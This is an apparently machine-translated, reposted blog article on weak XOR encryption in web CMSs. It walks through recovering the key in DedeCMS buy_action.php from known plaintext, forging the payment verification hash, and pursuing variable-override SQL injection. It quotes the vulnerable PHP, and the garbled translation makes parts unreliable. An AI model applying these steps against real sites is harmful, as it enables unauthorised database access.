The beauty of different or encryption # popular weak web Algorithms

The beauty of different or encryption # popular weak web Algorithms
The original author of this article is @ my5t3ry, not me.

Some images are even borrowed directly. I am not copying a dog --
Brother is the one holding the big bull's thigh.
The Study of symmetric algorithms produces a sexual desire for exclusive or encryption.

I AM BACK ~

Popular Science helps beginners understand algorithms. Different or encryption is a very popular Encryption Algorithm in web applications. It can be trusted by security filtering) the user data and encryption key are encrypted by algorithm, and the generated string is passed to execute the SQL operation.

However, this algorithm is extremely insecure because it is in an exclusive or algorithm.

A^K=E  E^A=K  

 

With A and E (strings before and after encryption), we get k. Once we know the key, we can construct the string locally (evilcode) for attack!
Today we are studying DedeCMS (buy_action.php)

This is a simple XOR algorithm.

0x01 first recognized your beauty and algorithm analysis

string[0]^key[0] 

Then

string[1]^key[1] 

Add them to the end of $ code. There are two scenarios.

Case one

$ Key length (18) <= $ string Length

When $ k = $ I = 17, the $ key is used as the key, and the next execution will become:

$i=18  $k=0  

That is to say, the bitwise operation is as follows:

key    |  i  a  m  a  k  e  y   i   m   string |  i  a  m  a  s  r   i   n   g   

The key is repeated multiple times until the string is fully encrypted!
Case two

$ Key length (18)> $ string Length

So when

$k=$i=  strlen($string) -1

$ String is exhausted, and the next execution will jump out. That is to say, the key is not completely entered $ code.
As follows:

key    |  i  a  m  a  k  (e  y )  string |  i  a  m  a  s

The brackets indicate that the $ code section is not displayed.
Now, after analyzing the algorithm, we can think about how to inject the key.

0x02 banned against elaborate beauty attack Algorithms

Now, we need to obtain the complete key.
Select case one.

The idea is to construct

string>=18  

Then construct a string on the affected web and get $ code, and then go to the local device.

$string^$code 

You can get the key of $ key... md5, and then construct $ pr_verify for fraudulent verification.

$pr_verify=md5("payment".$pr_encode.$cfg_cookie_encode);

Perform GLOBALS [mongo_dbprefix] overwrite injection through variable override

The following figure shows the code.
Let's first look at how $ string ($ pr_encode in the Code) is obtained.

$pr_encode = '';      foreach($_REQUEST as $key => $val)      {          $pr_encode .= $pr_encode ? "&$key=$val" : "$key=$val";      }      $pr_encode = str_replace('=', '', mchStrCode($pr_encode));      $pr_verify = md5("payment".$pr_encode.$cfg_cookie_encode);      $tpl = new DedeTemplate();      $tpl->LoadTemplate(DEDEMEMBER.'/templets/buy_action_payment.htm');      $tpl->Display();  

Let's take control of it.

Here

$string=product=card&pid=1.$_COOKIES

Because $ _ REQUEST obtains parameters from $ _ GET-> $ _ POST-> $ _ COOKIE in sequence.

Therefore, the encrypted $ code (that is, $ pd_encode) contains all post and cookies.

That is

$string>=$key  

Therefore, we directly retrieve the 18-bit coincidence of the post for cracking. We don't need to worry about the latter. Otherwise, the obtained key is repeated over and over due to the different repetitions of the case one.

In this way, we get the key in the MD5 form, but it is 18 bits, remove the last two bits, and start running.

The story is that variable overwrite is not discussed in this article.

0x03 Advantages and Disadvantages of Algorithms

Simple differences or algorithms are actually not complex because they are nothing more than the Virginia password. It is included in this book because it is popular in commercial software packages, at least in the MS-DOS and Macintosh world [1502,1387]. Unfortunately, if a software security program claims that it has a "proprietary" encryption algorithm (which is faster than DES) --- | applies Cryptography
It is true that the difference or algorithm is lightweight and uses bitwise operations, which has a great advantage in speed.
However, being lightweight and simple brings about weak logic. Therefore, you should be more careful when using it. For example, you should have more demanding requirements on the complexity of $ key.
Otherwise, the safe_code will be changed to evil_code.

0x04 you can write security algorithms only when you are a very good programmer.

So what is the difference or is it safe and easy? Let's take a look at this of qibo cms.

There are two advantages:
I. The top secret string is controllable in three parts and two parts

$webdb[mymd5].$rand.'5*j,.^&;?.%#@!' 

The complexity is terrible.

2. Introduce MD5code to add the input parameter to the key.

$md5code=substr($string,-10);    $key = md5($md5code.$secret_string);  

Makes the key extremely complex.

Two times of adding salt and soy sauce MD5, within a certain period of time, basically cannot crack.

Therefore, a different or algorithm can be a strong algorithm, but the premise is to ensure key security. Of course, the qibo system has several vulnerabilities that can read keys, which also results in the evilcode algorithm being able to eventually obtain background permissions.

0x05 references

DedeCMS newest kill injection (buy_action.php) Vulnerability Analysis